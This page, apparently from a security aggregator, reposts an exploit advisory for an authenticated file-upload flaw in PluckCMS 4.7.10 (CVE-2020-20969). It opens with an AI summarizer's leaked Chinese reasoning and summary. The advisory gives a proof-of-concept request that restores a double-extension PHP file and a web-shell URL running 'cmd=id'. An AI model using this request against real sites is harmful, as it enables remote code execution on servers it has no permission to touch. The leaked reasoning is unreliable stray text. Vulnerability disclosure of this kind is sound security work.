PluckCMS 4.7.10 Unrestricted File Upload
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不要用“文章内容总结”或“这篇文章”这样的开头。用户提供的文章是关于PluckCMS 4.7.10的一个未授权文件上传漏洞的详细说明。 首先,我得通读整篇文章,抓住关键点。文章提到了漏洞的标题、日期、作者、版本等信息,但这些可能不需要全部包含在内。重点在于漏洞的描述和影响。 接下来,文章给出了一个POC(概念验证),通过GET请求来恢复被删除的文件,并利用了双重扩展名绕过服务器过滤。这说明攻击者可以上传恶意文件,然后通过特定的URL访问它,执行任意命令。 此外,漏洞的利用条件包括需要有效的会话cookie、存在特定文件以及服务器不过滤双重扩展名。这意味着攻击者必须已经登录,并且服务器的安全措施不够严格。 总结的时候,我需要涵盖这些关键点:PluckCMS 4.7.10版本中的未授权文件上传漏洞,允许攻击者上传恶意文件并通过双重扩展名绕过过滤,在服务器上执行任意代码。同时提到需要有效会话和特定条件。 现在我要把这些信息浓缩到100字以内,确保语言简洁明了,不使用任何开头语。可能的结构是:指出漏洞名称、影响版本、攻击方式、绕过方法以及利用条件。 最后检查一下是否所有重要信息都包含进去,并且没有超过字数限制。 </think> PluckCMS 4.7.10 存在未授权文件上传漏洞,允许攻击者通过构造恶意请求上传并恢复恶意文件(如 `exploit.php.jpg`),利用双重扩展名绕过服务器过滤机制,在目标服务器上执行任意代码。此漏洞需有效会话 cookie 和特定条件支持。 2026-3-8 15:40:55 Author: cxsecurity.com(查看原文) 阅读量:9 收藏

# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/pluck-cms/pluck/ # Software Link: https://github.com/pluck-cms/pluck/ # Version: 4.7.10 # Tested on: Windows # CVE : CVE-2020-20969 Proof Of Concept GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1 Host: pluck Cookie: PHPSESSID=[valid_session_id] **Access Method:** http://pluck/files/exploit_copy.php?cmd=id **Additional Conditions:** 1. Valid session cookie required (authenticated attack) 2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration 3. Server must not filter double extensions during file upload/trash operations Steps to Reproduce Log in as an admin user. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie. The file will be restored and can be accessed through the url.



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026030016
如有侵权请联系:admin#unsafe.sh